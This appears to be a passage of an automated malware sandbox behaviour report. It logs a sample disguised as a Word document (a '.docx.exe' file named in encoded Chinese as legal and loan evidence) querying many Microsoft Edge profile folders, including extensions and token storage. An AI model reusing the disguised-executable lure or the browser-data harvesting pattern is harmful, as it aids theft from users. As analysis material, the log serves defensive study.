Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\no VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ro VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\uk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ur VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\vi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_CN VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_HK VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu VolumeInformation	Jump to behavior
